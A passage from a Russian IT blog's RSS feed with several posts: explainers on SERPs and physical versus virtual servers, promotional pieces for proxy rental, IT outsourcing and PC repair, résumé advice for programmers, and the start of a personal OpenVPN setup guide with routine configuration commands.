					<wfw:commentRss>https://litl-admin.ru/seo/skvoznaya-analitika-chto-eto-takoe-dlya-chego-ona-nuzhna.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Что такое SERP, из каких основных элементов он состоит?</title>
		<link>https://litl-admin.ru/seo/chto-takoe-serp-iz-kakix-osnovnyx-elementov-on-sostoit.html</link>
					<comments>https://litl-admin.ru/seo/chto-takoe-serp-iz-kakix-osnovnyx-elementov-on-sostoit.html#respond</comments>
		
		
		<pubDate>Tue, 09 Aug 2022 11:32:41 +0000</pubDate>
				<category><![CDATA[SEO]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7381</guid>

					<description><![CDATA[Search Engine Results Page, сокращенное до аббревиатуры SERP, представляет собой страницу в международной сети Интернет, на которой выдаются результаты согласно поисковому запросу, часто данный термин обозначают по-простому «выдача» либо «поисковая выдача». Понятие SERP – это первое, что видит пользователь, после того, как вводит запрос (он же ключевое слово) и нажимает на Enter. Элементы, выполняющие определенные [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Search Engine Results Page, сокращенное до аббревиатуры SERP, представляет собой страницу в международной сети Интернет, на которой выдаются результаты согласно поисковому запросу, часто данный термин обозначают по-простому «выдача» либо «поисковая выдача».</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/08/2022-08-09_22-28-48.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7384" src="https://litl-admin.ru/wp-content/uploads/2022/08/2022-08-09_22-28-48-620x532.png" alt="" width="620" height="532" srcset="https://litl-admin.ru/wp-content/uploads/2022/08/2022-08-09_22-28-48-620x532.png 620w, https://litl-admin.ru/wp-content/uploads/2022/08/2022-08-09_22-28-48-768x659.png 768w, https://litl-admin.ru/wp-content/uploads/2022/08/2022-08-09_22-28-48.png 800w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="532"></span></a></p>
<h2>Понятие</h2>
<p><a href="https://www.calltouch.ru/blog/chto-takoe-serp-i-kak-povliyat-na-poiskovuyu-vydachu/" target="_self" rel="noopener">SERP – это</a> первое, что видит пользователь, после того, как вводит запрос (он же ключевое слово) и нажимает на Enter.</p>
<p><a href="https://www.calltouch.ru/blog/kak-posmotret-statistiku-vo-vkontakte-i-provesti-analiz-straniczy/"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="size-full wp-image-7382 alignright" src="https://litl-admin.ru/wp-content/uploads/2022/08/754788645943184.jpeg" alt="" width="300" height="200" /><meta itemprop="width" content="300"><meta itemprop="height" content="200"></span></a></p>
<p>Элементы, выполняющие определенные функции в интерфейсе SERP, являются для всех поисковых систем неизменными в течение продолжительного периода времени.</p>
<p>Однако для пользователей ежедневно данная поисковая страница представляется по-новому, так как большую часть пространства занимают меняющиеся блоки рекламы контекстного типа и органическая выдача.</p>
<p>Кроме того есть элементы, появляющиеся для выполнения определенных опций, в зависимости от того, какой тип запроса вводится: определенные элементы управления, связанные запросы или шорткаты.</p>
<h2>Основные элементы</h2>
<ul>
<li>Выдача органического типа. Является основополагающим элементом SERP. Представляет собой набор нескольких ссылок на страницы в сети Интернет, проиндексированные поисковиком и выданные тому, кто ввел запрос, при этом с учетом последовательности ранжирования. К каждой ссылке прикреплен тег и сниппет (емкая короткая выдержка из выданной страницы, которая больше всего по смыслу соответствует запросу).</li>
<li>Выдача коммерческого типа. Представляет собой блоки с рекламой контекстного типа, среди которой встречаются объявления в виде текста, текста совместно с графикой, и мультимедийная реклама. В основном выдача коммерческого типа появляется на экране выше выдачи органического типа, правее нее или прямо под ней. Количество объявлений варьируется в зависимости от востребованности запроса пользователя среди рекламодателей. По менее востребованным запросам выдача коммерческого типа может не появляться на экране.</li>
<li>Шорткаты. Представляют собой элементы, появляющиеся в качестве ответа на определенную категорию запросов пользователей. Шорткаты являются, по сути, сгенерированным емким коротким ответом на пользовательский вопрос, выдаваемый в автоматическом режиме непосредственно поисковой системой. В шорткатах отсутствуют отсылки к любым сайтам. Например, поисковик выдает на запрос пользователя конкретный курс валют на заданную дату, точное время, может показать точное расстояние от одного населенного пункта до другого и прочая информация, которая не требует дополнительной расшифровки.</li>
<li>Запросы связанного типа. Поисковик в некоторых ситуациях отображает возможный запрос пользователя, если он распознает ошибку в запросе, набранном человеком, данная ошибка исправляется поисковой системой в автоматическом режиме, сопровождая уведомлением для пользователя об исправлении ошибки.</li>
<li>Элементы управления. К данным элементам причисляются ссылки, которые позволяют при нажатии на них перейти на другую страницу выдачи, а также прочие разделы поисковика и ссылки на другие объекты и др.</li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/seo/chto-takoe-serp-iz-kakix-osnovnyx-elementov-on-sostoit.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Физический или виртуальный сервер – что выбрать?</title>
		<link>https://litl-admin.ru/dlya-kolleg/fizicheskij-ili-virtualnyj-server-chto-vybrat.html</link>
					<comments>https://litl-admin.ru/dlya-kolleg/fizicheskij-ili-virtualnyj-server-chto-vybrat.html#respond</comments>
		
		
		<pubDate>Fri, 05 Aug 2022 00:18:36 +0000</pubDate>
				<category><![CDATA[Для коллег]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7380</guid>

					<description><![CDATA[Безусловно, любое виртуальное явление рождается из физических ресурсов, к коим относится IT-оборудование и программное обеспечение. В виртуальных хостингах физическое размещение осуществляется на серверах провайдеров. Однако облачные площадки не могут удовлетворить нужды серьезных интернет-проектов, которые требуют больших объемов вычислительных ресурсов. С такой задачей успешно справляются физические серверы – «железо». Купить топовые ИС по цене производителя предлагает [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Безусловно, любое виртуальное явление рождается из физических ресурсов, к коим относится IT-оборудование и программное обеспечение. В виртуальных хостингах физическое размещение осуществляется на серверах провайдеров. Однако облачные площадки не могут удовлетворить нужды серьезных интернет-проектов, которые требуют больших объемов вычислительных ресурсов. С такой задачей успешно справляются физические серверы – «железо». Купить топовые ИС по цене производителя предлагает торговая площадка на <a href="https://sibrs.ru/">веб-портале sibrs.ru</a></p>
<p>Физический сервер – оборудование, направленное на хранение информации или эффективное решение определенных задач без оператора. Сначала аппаратный комплекс программируется с учетом поставленной цели, далее он работает самостоятельно, выполняя установленные на нем команды. «Железо» подключается к портам, соединяющим его с Всемирной паутиной. Чем выше пропускная возможность порта, тем быстрее работает ИС.</p>
<h2>В чем плюсы собственного физического сервера?</h2>
<p>Физический сервер подбирают под индивидуальные требования, с учетом поставленных задач. Если этого не сделать, можно «пролететь». Первый вариант – существенная выгода не будет достигнута, второй – вы переплачиваете, покупая слишком мощное оборудование, в котором ваш бизнес не нуждается. В такой ситуации нельзя действовать опрометчиво, а следует консультироваться со специалистами.</p>
<p>Ниже приведены преимущества физической «машины».</p>
<ol>
<li>Конфиденциальность данных и полная независимость, чего не может дать виртуальный хостинг. Получить доступ к «железу» или отключить его могут только администраторы компании-владельца.</li>
<li>Любая проблема решается на месте и оперативно. Исправить сбой можно ручным перезапуском или иным доступным действием.</li>
<li>Администратор может рассчитать необходимые объемы мощности, чтобы отключить или задействовать для другого проекта оставшиеся ресурсы.</li>
<li>Для работы одной компании создается индивидуальная архитектура, обеспечивающая эффективное взаимодействие компьютерной сети, производственного либо офисного оборудования.</li>
<li>В любой нестандартной ситуации сервер можно просто отключить от питания.</li>
<li>Локальную сеть всегда можно перепрограммировать для решения других задач.</li>
<li>Только физический сервер обеспечит полную безопасность собственных разработок, изобретений, защитив их от кражи и обнародования.</li>
</ol>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/dlya-kolleg/fizicheskij-ili-virtualnyj-server-chto-vybrat.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Прокси-сервера в аренду</title>
		<link>https://litl-admin.ru/obzory/proksi-servera-v-arendu.html</link>
					<comments>https://litl-admin.ru/obzory/proksi-servera-v-arendu.html#respond</comments>
		
		
		<pubDate>Mon, 25 Jul 2022 11:18:57 +0000</pubDate>
				<category><![CDATA[Для коллег]]></category>
		<category><![CDATA[Обзоры]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7377</guid>

					<description><![CDATA[Вслед за статьёй про создание собственного VPN-сервера можно пустить вдогонку статейку про аренду прокси-сервера proxy seller. Это немного другой сервис, сейчас кратко разберём основные различия. Чем отличается VPN и Proxy (прокси)? Основное различие в том, что прокси работает преимущественно с http-протоколом. По сути как бы встраивается между вами и целевым сервисом немного модифицируя заголовки запросов. [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Вслед за статьёй про создание собственного VPN-сервера можно пустить вдогонку статейку про аренду прокси-сервера <a href="https://proxy-seller.io/" target="_blank" rel="noopener"><br />
proxy seller</a>. Это немного другой сервис, сейчас кратко разберём основные различия.<br />
<a href="https://litl-admin.ru/wp-content/uploads/2022/07/proxy.jpg" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-full wp-image-7378" src="https://litl-admin.ru/wp-content/uploads/2022/07/proxy.jpg" alt="" width="608" height="322" /><meta itemprop="width" content="608"><meta itemprop="height" content="322"></span></a></p>
<h2>Чем отличается VPN и Proxy (прокси)?</h2>
<p>Основное различие в том, что прокси работает преимущественно с http-протоколом. По сути как бы встраивается между вами и целевым сервисом немного модифицируя заголовки запросов. Есть развитие прокси в виде socks &#8211; более функциональный, работает с любыми портами. Но суть в общем-то та же.</p>
<p>Теперь VPN. ВПН &#8211; технология построения виртуальных частных сетей. То есть вы фактически выделяете новый сегмент поверх существующего. Здесь возможно прикрутить шифрование (AES &#8211; реальный стандарт, не поддающийся взлому), сжатие данных. И много чего ещё. Читайте <a title="Поднимаем OpenVPN на Linux" href="https://litl-admin.ru/linux/podnimaem-openvpn-na-linux.html" target="_blank" rel="noopener">статью про VPN</a>.</p>
<h2>Что лучше?</h2>
<p>Как всегда, в таких случаях важно учитывать контекст. Для работы браузера или приложения, работающего через HTTP &#8211; прокси будет быстрее и легковеснее. Если нужно объединить два узла, находящиеся в разных частях Земли в одну сеть так, как если бы это были соседи по комнате &#8211; то VPN однозначно.</p>
<p>Если нужна приватность данных &#8211; VPN. Если нужно сделать какой-нибудь парсер, собирающий данные с других сайтов и &#8220;представляющийся&#8221; пачкой посетителей из других стран &#8211; лучше прокси. И так далее.</p>
<p>На сайтах с арендой прокси как правило пишут для каких целей предназначены те или иные варианты. Вот лишь некоторые из них:</p>
<ul>
<li>доступ в Инстаграм, Facebook, VK, Одноклассники, YouTube;</li>
<li>прокси для Yandex, Google, KeyCollector (программа для парсинга ключевых запросов);</li>
<li>прокси для онлайн-игр (даже перечислять не буду, я &#8211; динозавр, даже таких названий не знаю) <img src="https://litl-admin.ru/wp-content/themes/root/images/smilies/smile.png" alt=":)" class="wp-smiley" style="height: 1em; max-height: 1em;" /></li>
<li>для интернет-магазинов, букмейкерских контор, &#8230;</li>
</ul>
<p>Прокси покупается (арендуется) в личное пользование, продавец гарантирует, что на период аренды им будете пользоваться только вы. К сожалению, нет гарантии того, что до вашей аренды его не использовали в какой-то противоправной деятельности, так как ни провайдер ни магазин прокси не ведут статистику и историю покупок.</p>
<p>на момент написания статьи на сайте можно было арендовать адреса из 53 стран (~800 подсетей).</p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/obzory/proksi-servera-v-arendu.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Аутсорс в обслуживании компьютерного парка</title>
		<link>https://litl-admin.ru/obzory/autsors-v-obsluzhivanii-kompyuternogo-parka.html</link>
					<comments>https://litl-admin.ru/obzory/autsors-v-obsluzhivanii-kompyuternogo-parka.html#respond</comments>
		
		
		<pubDate>Mon, 25 Jul 2022 10:45:41 +0000</pubDate>
				<category><![CDATA[Для коллег]]></category>
		<category><![CDATA[Обзоры]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7374</guid>

					<description><![CDATA[Вслед за компанией по ремонту офисной компьютерной техники хочется ещё раз напомнить про компании, выполняющие обслуживание офисной техники по принципу аутсорса. Что это значит для владельцев бизнеса? Компания с узкоспециализированными специалистами берёт на себя все задачи по обслуживанию серверов и рабочих станций, настройке серверов, телекоммуникационного оборудования и телефонии и решению всевозможных проблем. Это и многое [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Вслед за компанией по ремонту офисной компьютерной техники хочется ещё раз напомнить про компании, выполняющие <a href="https://itliga.ru/services/outsourcing/obsluzhivanie-kompyuternoy-tekhniki/" target="_blank" rel="noopener">обслуживание офисной техники</a> по принципу аутсорса.</p>
<p>Что это значит для владельцев бизнеса?</p>
<p>Компания с узкоспециализированными специалистами берёт на себя все задачи по обслуживанию серверов и рабочих станций, настройке серверов, телекоммуникационного оборудования и телефонии и решению всевозможных проблем.</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/07/obsluzhivaniye-komp_yuternoy-tekhniki.jpg" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-full wp-image-7375" src="https://litl-admin.ru/wp-content/uploads/2022/07/obsluzhivaniye-komp_yuternoy-tekhniki.jpg" alt="" width="600" height="400" /><meta itemprop="width" content="600"><meta itemprop="height" content="400"></span></a></p>
<h2>Это и многое другое</h2>
<ul>
<li>обслуживание компьютеров, оргтехники, сервреов, локальных сетей, объединение офисов через VPN;</li>
<li>аудит, оптимизация и настройка IT-инфраструктуры;</li>
<li>решение проблем удалённо и с выездом по Москве, Московской области и Нижнему Новгороду;</li>
<li>внедрение и развитие антивирусных решений;</li>
<li>администрирование физических и виртуальных серверов, телефонии, сетевого оборудования;</li>
<li>мониторинг инфраструктуры;</li>
<li>сопровождение 1С, внедрение корпоративной почты и разработка сайтов.</li>
</ul>
<h2>Успешные кейсы</h2>
<p><a href="https://itliga.ru/projects/mchs/" target="_blank" rel="nofollow noopener">Решение для внутренней коммуникации подразделений МЧС</a>.</p>
<p><a href="https://itliga.ru/projects/koll-tsentr-dlya-aeroporta-sheremetevo/" target="_blank" rel="nofollow noopener">Колл-центр для аэропорта Шереметьево</a>.</p>
<p><a href="https://itliga.ru/projects/vnedrenie-sistemy-rezervnogo-kopirovaniya-dlya-gup-mosgortrans/" target="_blank" rel="nofollow noopener">Внедрение системы резервного копирования</a></p>
<p>&#8230; другие проекты предоставлены на сайте, не буду перечислять их все.</p>
<p>Просто, чтобы было понятно, что масштабы проектов заслуживают внимания и задачи достаточно разнообразны.</p>
<h2>Зачем отдавать на аутсорс?</h2>
<p>Извечный вопрос. Всегда кажется, что можно сэкономить, если нанять студента на полставки, который будет &#8220;переустанавливать виндоус&#8221;.</p>
<p>Но всегда есть риски:</p>
<ol>
<li>Студент банально может не справиться с объёмами и сложной задачей.</li>
<li>Найдёте студента со знанием Asterisk и VMWare vSphere?</li>
<li>А студент возьмёт на себя ответственность за интеграцию дорогого решения в критически важный бизнес-процесс?</li>
<li>А не махнёт ли рукой студент, вкалывающий за копейки, когда найдёт чуть более высокооплачиваемую работу?</li>
</ol>
<p>Если брать эти и многие другие вопросы во внимание, то становится понятно, что не так уж и хорош &#8220;бесплатный/дешёвый сыр&#8221;.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/obzory/autsors-v-obsluzhivanii-kompyuternogo-parka.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Срочный ремонт моноблоков в Москве</title>
		<link>https://litl-admin.ru/zhelezo/srochnyj-remont-monoblokov-v-moskve.html</link>
					<comments>https://litl-admin.ru/zhelezo/srochnyj-remont-monoblokov-v-moskve.html#respond</comments>
		
		
		<pubDate>Thu, 21 Jul 2022 04:29:43 +0000</pubDate>
				<category><![CDATA[Для коллег]]></category>
		<category><![CDATA[Железо]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7366</guid>

					<description><![CDATA[С чем обязательно столкнутся офисы, поставившие на вооружение парк компьютеров в виде моноблоков &#8211; так это в особенностях ремонта. Если классический системный блок представляет собой достаточно открытую конфигурацию, где можно без проблем апгрейдить элементную базу &#8211; будь то добавление дополнительного жёсткого диска, замена материнской платы или добавление оперативной памяти, так и произвести ремонт &#8211; открыл [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>С чем обязательно столкнутся офисы, поставившие на вооружение парк компьютеров в виде моноблоков &#8211; так это в особенностях ремонта. Если классический системный блок представляет собой достаточно открытую конфигурацию, где можно без проблем апгрейдить элементную базу &#8211; будь то добавление дополнительного жёсткого диска, замена материнской платы или добавление оперативной памяти, так и произвести ремонт &#8211; открыл корпус, заменил &#8220;почерневший обугленный модуль&#8221; <img src="https://litl-admin.ru/wp-content/themes/root/images/smilies/smile.png" alt=":-)" class="wp-smiley" style="height: 1em; max-height: 1em;" /> и собрал обратно.</p>
<p>В случае с моноблоками или  ноутбуками обычно дела обстоят иначе. Просто так не подлезть, требуется чуть более высокий уровень квалификации, да и ландшафт hardware для замены (апгрейда) заметно меньше.</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/07/mono1.jpg" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7367" src="https://litl-admin.ru/wp-content/uploads/2022/07/mono1-620x551.jpg" alt="" width="620" height="551" srcset="https://litl-admin.ru/wp-content/uploads/2022/07/mono1-620x551.jpg 620w, https://litl-admin.ru/wp-content/uploads/2022/07/mono1.jpg 640w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="551"></span></a>Позволю себе немного прорекламировать сайт партнёров из Москвы, занимающихся как раз таки <a href="https://mono-block.ru/" target="_blank" rel="noopener">ремонтом моноблоков</a> любой сложности.</p>
<p>Большинство проблем с моноблоками решается прямо на месте, без необходимости экстрадиции &#8220;больного&#8221; в сервисный центр. Что хорошо &#8211; работают легально, как с физическими лицами, так и с юридическими, с возможностью оплаты по безналичному расчёту. Все необходимые чеки на выполненные работы предоставляются, так же как и гарантия.</p>
<h2>Почему лучше обращаться к специалистам</h2>
<p><em>(а не чинить самостоятельно)</em></p>
<p>Два случая из реальной жизни, не совсем про моноблоки.</p>
<p>Одно время я любил сам во всём разбираться, ремонтировал свой (да и не только свой) ноутбук. Фотал, кстати, для своего сайта материал на нём. И вот, в очередной раз при разборке просто оторвал шлейф случайно. Можно было бы заказать новый, в моём городе &#8211; не продают. Но ждать с Китая очень долго. Это месяц. В итоге плюнул и решил, что 20+ лет ноуту уже пора на покой. А у ноута родственников просто сломалась кнопка. Как сломали &#8211; не знаю, давили сильно может быть. Соответственно опять пришлось бы заказывать детальку. В нормальном сервисном центре все такие мелкие &#8220;расходники&#8221;, будь то USB-разъемы или кнопки &#8211; уже скорее всего есть в наличии.</p>
<p>Случай второй &#8211; при ремонте смартфона. Детали уже не помню, но отдал товарищу, который &#8220;набил руку уже&#8221; на заменах дисплея. Каким-то образом он &#8220;зарукожопил&#8221; так, что пришлось заказывать ещё и материнскую плату к телефону. И даже после её замены телефон вообще не видел WiFi сеть (еле-еле, будто проблемы с антенной, хотя она была целая). Вот что значит &#8220;кустарщина&#8221;. Поэтому всё-таки лучше сэкономить своё время и нервы (и даже деньги, часто) и обратиться к тем, за чьими плечами не 1-3 успешных аппарата, а десятки-сотни.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/zhelezo/srochnyj-remont-monoblokov-v-moskve.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Признаки хорошего программиста, которые следует отразить в резюме</title>
		<link>https://litl-admin.ru/offtopik/priznaki-xoroshego-programmista-kotorye-sleduet-otrazit-v-rezyume.html</link>
					<comments>https://litl-admin.ru/offtopik/priznaki-xoroshego-programmista-kotorye-sleduet-otrazit-v-rezyume.html#respond</comments>
		
		
		<pubDate>Wed, 20 Jul 2022 22:57:11 +0000</pubDate>
				<category><![CDATA[Оффтопик]]></category>
		<category><![CDATA[Прочее]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7363</guid>

					<description><![CDATA[Программист или кодер — человек, занимающийся созданием компьютерного программного обеспечения на специальном языке программирования. Такой специалист может разработать исходный код для программы компьютерной операционной системы, различных видеоигр, мобильных приложений, а также создать алгоритмы для любой электронной техники. Сегодня на рынке профессий свои услуги предлагает большое количество людей, работающих в сфере программирования. Но, чтобы найти работодателя, [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Программист или кодер — человек, занимающийся созданием компьютерного программного обеспечения на специальном языке программирования. Такой специалист может разработать исходный код для программы компьютерной операционной системы, различных видеоигр, мобильных приложений, а также создать алгоритмы для любой электронной техники.</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/07/резюме-программиста-2-1024x576-1.jpg" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7364" src="https://litl-admin.ru/wp-content/uploads/2022/07/резюме-программиста-2-1024x576-1-620x349.jpg" alt="" width="620" height="349" srcset="https://litl-admin.ru/wp-content/uploads/2022/07/резюме-программиста-2-1024x576-1-620x349.jpg 620w, https://litl-admin.ru/wp-content/uploads/2022/07/резюме-программиста-2-1024x576-1-940x529.jpg 940w, https://litl-admin.ru/wp-content/uploads/2022/07/резюме-программиста-2-1024x576-1-768x432.jpg 768w, https://litl-admin.ru/wp-content/uploads/2022/07/резюме-программиста-2-1024x576-1.jpg 1024w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="349"></span></a></p>
<p>Сегодня на рынке профессий свои услуги предлагает большое количество людей, работающих в сфере программирования. Но, чтобы найти работодателя, готового платить хорошие деньги за предоставленные услуги, приходится пройти строгий отбор и с самого начала показать уровень своего профессионализма. Для этих целей и составляется резюме. И если анкета составлена грамотно, то шансы получить желаемую должность значительно вырастают. Следует учитывать, что при составлении хорошего резюме в него необходимо вносить не только свои технические данные и уровень образования, но и обязательные личностные качества, соответствующие требованиям работодателя. Тут подробно рассказано <a href="https://top-programming.ru/blog/professionalnye-i-lichnye-kachestva-programmista">https://top-programming.ru/blog/professionalnye-i-lichnye-kachestva-programmista</a>, какими именно качествами должен обладать хороший программист.</p>
<h2>Рассмотрим самые основные из них</h2>
<p>Личностные качества, которым работодатели уделяют особое внимание</p>
<p>Помимо того, что хороший программист должен хорошо знать математику, английский, логику и все базовые навыки программирования, он непременно должен обладать целым списком необходимых личностных качеств:</p>
<ul>
<li><strong>Аналитический склад мышления и умение решать новые задачи.</strong> Программирование – создание чего-то нового. Иногда перед специалистом стоит такая задача, на которую еще нет ответа. Необходимо не бояться ничего нового, уметь брать на себя ответственность и принимать нестандартные решения.</li>
<li><strong>Упорство, умение быстро концентрировать внимание на поставленной задаче, усидчивость.<br />
</strong>Специфика работы программиста предполагает постоянную концентрацию на мелких деталях, алгоритмах и цифрах. Необходимо все время проявлять пристальное внимание, чтобы не упустить даже мельчайших значений, которые играют важную роль в создаваемом проекте. А иногда, приходится проделывать одно и то же действие по нескольку десятку раз, чтобы добиться необходимого результата, что требует невероятной усидчивости, стрессоустойчивости и умения сохранять интерес к монотонной работе.</li>
<li><strong>Общительность, желание и умение работать в команде.</strong><br />
Программист не работает в «стол». Все его идеи разрабатываются для того, чтобы быть реализованными. Поэтому хороший специалист должен уметь общаться с людьми, находить контакты взаимодействия, уметь подать и отстоять свои идеи, коммуницировать как с заказчиком, так и с командой, с которой ему придется работать.</li>
<li><strong>Энтузиазм, ответственность и готовность идти вперед.<br />
</strong>Хороший кодер должен понимать, что его профессия предполагает постоянный рост и развитие. Программирование, как и современные технологии – вечно двигающийся вперед процесс. Квалифицированный специалист должен не терять энтузиазма, всегда держать руку на пульсе и шагать в ногу с современной наукой. Нет программиста, который уже все знает и умеет, есть люди, которые готовы бесконечно развиваться в этой профессии.</li>
</ul>
<p><em>Именно эти качества работодатель указывает в требованиях к специалисту непросто для галочки, а в подтверждение тому, что человек действительно является профессионалом своего дела и по-настоящему хороший программист.</em></p>
<p>Источник: <a href="https://top-programming.ru">top-programming.ru</a></p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/offtopik/priznaki-xoroshego-programmista-kotorye-sleduet-otrazit-v-rezyume.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Собственный VPN для доступа к закрытым ресурсам (на примере Instagram)</title>
		<link>https://litl-admin.ru/utility/sobstvennyj-vpn-dlya-dostupa-k-zakrytym-resursam-na-primere-instagram.html</link>
					<comments>https://litl-admin.ru/utility/sobstvennyj-vpn-dlya-dostupa-k-zakrytym-resursam-na-primere-instagram.html#respond</comments>
		
		
		<pubDate>Sun, 17 Jul 2022 03:17:00 +0000</pubDate>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Утилиты]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7358</guid>

					<description><![CDATA[После того, как началось массовое блокирование информационных ресурсов по географической принадлежности (например тот же Instagram и многие технические форумы), большую популярность получили различные VPN-сервисы. VPN &#8211; &#8220;виртуальная частная сеть&#8221;, говоря простым языком, поверх (внутри) имеющейся глобальной сети Интернет строится ещё одна сеть, которая объединяет различные устройства, изолирует их от внешнего воздействия. Например можно соединить в [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>После того, как началось массовое блокирование информационных ресурсов по географической принадлежности (например тот же Instagram и многие технические форумы), большую популярность получили различные VPN-сервисы.</p>
<blockquote class="info"><p><strong>VPN</strong> &#8211; &#8220;виртуальная частная сеть&#8221;, говоря простым языком, поверх (внутри) имеющейся глобальной сети Интернет строится ещё одна сеть, которая объединяет различные устройства, изолирует их от внешнего воздействия. Например можно соединить в одну сеть два своих офиса, расположенные в разных частях города или вообще в разных странах так, как если бы они были подключены прямым кабелем.</p></blockquote>
<h2>Проблема</h2>
<p>Сейчас практически каждая &#8220;домохозяйка&#8221; использует VPN для доступа в &#8220;Инсту&#8221; даже не представляя, какие процессы при этом проходят &#8220;под капотом&#8221;. В AppStore и GooglePlay появились сотни приложений с &#8220;бесплатный ВПН&#8221;, напичканные рекламой, работающие через раз или вообще содержащие откровенно вредоносные закладки. Эти сервисы прикрывают один за другим, неизвестно, сколько просуществует тот или иной продукт.</p>
<h2>Решение</h2>
<p>Возникла естественная мысль &#8211; сделать свой VPN, тем более уже был опыт настройки OpenVPN. Осталось только привнести практический смысл в этот процесс.</p>
<p>План такой:</p>
<ol>
<li>Арендуем сервер где-нибудь в Нидерландах.</li>
<li>Настраиваем OpenVPN-сервер и NAT.</li>
<li>Выпускаем ключи доступа для каждого устройства, которое нужно подключить.</li>
</ol>
<h2>Реализация</h2>
<h3>Аренда сервера</h3>
<p>Для этого я пошёл к хостеру ВДСина, поскольку там, как мне кажется, самые лояльные тарифы и посуточная оплата, так, что можно &#8220;свернуть&#8221; проект или развернуть что-нибудь тестовое, поработать несколько дней и потерять не слишком много ресурсов.</p>
<blockquote class="check"><p>У меня есть у меня <a href="https://vdsina.ru/?partner=qmnqzjha3c" target="_blank" rel="nofollow noopener sponsored">партнёрская ссылка</a>, по которой <strong><span style="color: #0000ff;">вы</span> </strong>можете получить бонус <strong>10% скидку</strong> на услуги.</p></blockquote>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/07/vpn1.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7359" src="https://litl-admin.ru/wp-content/uploads/2022/07/vpn1-620x443.png" alt="" width="620" height="443" srcset="https://litl-admin.ru/wp-content/uploads/2022/07/vpn1-620x443.png 620w, https://litl-admin.ru/wp-content/uploads/2022/07/vpn1-940x672.png 940w, https://litl-admin.ru/wp-content/uploads/2022/07/vpn1-768x549.png 768w, https://litl-admin.ru/wp-content/uploads/2022/07/vpn1.png 1200w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="443"></span></a></p>
<p>Я выбираю &#8220;Стандартный сервер&#8221; на CentOS 7, с локацией в Амстердаме. Как видите, стоимость всего 6,6р в день (~200р в месяц), вполне себе доступная тема &#8211; один стаканчик кофе. При этом утилизация сервера &#8211; порядка 1-2%, так что можно ещё что-нибудь на нём развернуть.</p>
<p>После того, как сервер будет создан (около минуты), нужно подключиться к нему по VNC и настроить удобный SSH-доступ. Это мы уже тыщу раз делали, не буду на этом останавливаться.</p>
<h3>Настройка OpenVPN и NAT</h3>
<p>Работу по настройке OpenVPN я описывал <a title="Поднимаем OpenVPN на Linux" href="https://litl-admin.ru/linux/podnimaem-openvpn-na-linux.html" target="_blank" rel="noopener">ранее</a>, единственное, что сейчас версии вышли поновее. Конфиг практически тот же.</p>
<p>Что ещё нужно?</p>
<p>В файл <strong>/etc/sysctl.conf</strong> дописать:</p>
<p><code>net.ipv4.ip_forward=1</code></p>
<p>Чтобы работала маршрутизация между интерфейсами.</p>
<p>И пропишем в автостарт скрипт с openvpn:</p>
<p><code>openvpn --config /etc/openvpn/server.conf --daemon</code><br />
